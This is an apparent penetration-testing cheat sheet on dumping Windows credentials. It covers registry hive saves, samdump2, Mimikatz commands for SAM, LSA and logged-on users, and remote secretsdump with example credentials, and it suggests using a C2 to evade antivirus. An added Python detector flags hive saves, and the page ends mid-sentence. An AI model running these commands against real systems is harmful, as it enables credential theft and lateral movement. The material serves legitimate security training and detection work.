Credentials dumping

Manually querying registry keys

Windows local credential hashes - SAM, SECURITY, SYSTEM

Note: You need to be a Local Admin on the target system to be able to dump the registry keys.

reg save hklm\system system
reg save hklm\sam sam
reg save hklm\security security

Then use samdump2 or Impacket to extract the hashes.
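
A defender's view of the three reg save commands above, as an added example that is not part of the original page: a Python check over process-creation command lines that flags saves of the SAM, SYSTEM and SECURITY hives and raises severity when SAM and SYSTEM are both saved on one host within a short window, since offline hash extraction uses both files. The event tuples, host names, function names and the 300-second window are constructed assumptions.

```python
import re
from collections import defaultdict

# Matches: reg[.exe] save <HKLM|HKEY_LOCAL_MACHINE>\<sam|system|security> <outfile>
# The lookahead rejects subkey saves such as hklm\system\CurrentControlSet.
REG_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)'
    r'\\(sam|system|security)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed sample events (host, epoch seconds, command line); not real logs.
SAMPLE_EVENTS = [
    ("WS01", 1000, r"reg save hklm\system system"),
    ("WS01", 1004, r"reg save hklm\sam sam"),
    ("WS01", 1009, r"reg save hklm\security security"),
    ("WS02", 2000, r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SAM C:\Temp\s.hiv'),
    ("WS03", 3000, r"reg query hklm\software\microsoft /s"),
    ("WS04", 4000, r"reg save hklm\system C:\bk\system"),
    ("WS04", 9000, r"reg save hklm\sam C:\bk\sam"),
]


def saved_hive(cmdline):
    """Return the sensitive hive (lower-case) saved by this command, or None."""
    m = REG_SAVE.search(cmdline)
    return m.group(1).lower() if m else None


def detect(events, window=300):
    """Return {host: severity}: 'high' when SAM and SYSTEM are both saved
    within `window` seconds of each other, otherwise 'medium'."""
    hits = defaultdict(list)
    for host, ts, cmd in events:
        hive = saved_hive(cmd)
        if hive:
            hits[host].append((ts, hive))
    alerts = {}
    for host, seen in hits.items():
        sam = [t for t, h in seen if h == "sam"]
        system = [t for t, h in seen if h == "system"]
        paired = any(abs(a - b) <= window for a in sam for b in system)
        alerts[host] = "high" if paired else "medium"
    return alerts


if __name__ == "__main__":
    for host, severity in sorted(detect(SAMPLE_EVENTS).items()):
        print(host, severity)
```

In practice the command lines would come from process-creation telemetry with command-line logging enabled; the tuple layout here is only a stand-in for that feed.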

samdump2

Extracting local hashes. System and SAM files have been previously found on the Windows target system.

samdump2 system sam

Mimikatz

Note: You need a Local Admin account on the target system.

Mimikatz is very likely to be detected by AV and other protection measures. Using a C2 can help obfuscate Mimikatz.

Dump SAM credentials to a file named hash.txt

privilege::debug
token::elevate
log hash.txt
lsadump::sam sam.hiv security.hiv

Dump credentials in memory (logged in users)

privilege::debug
SEKURLSA::LogonPasswords

Dumping credentials from LSA (Local Security Authority)

lsadump::lsa /patch

Impacket - secretsdump.py

Dumps all the hashes from the SAM remotely.

root@kali# secretsdump.py marvel/fcastle:password1@192.168.57.142

Information

An LM:NT hash pair can have a null part.

Null LM part:
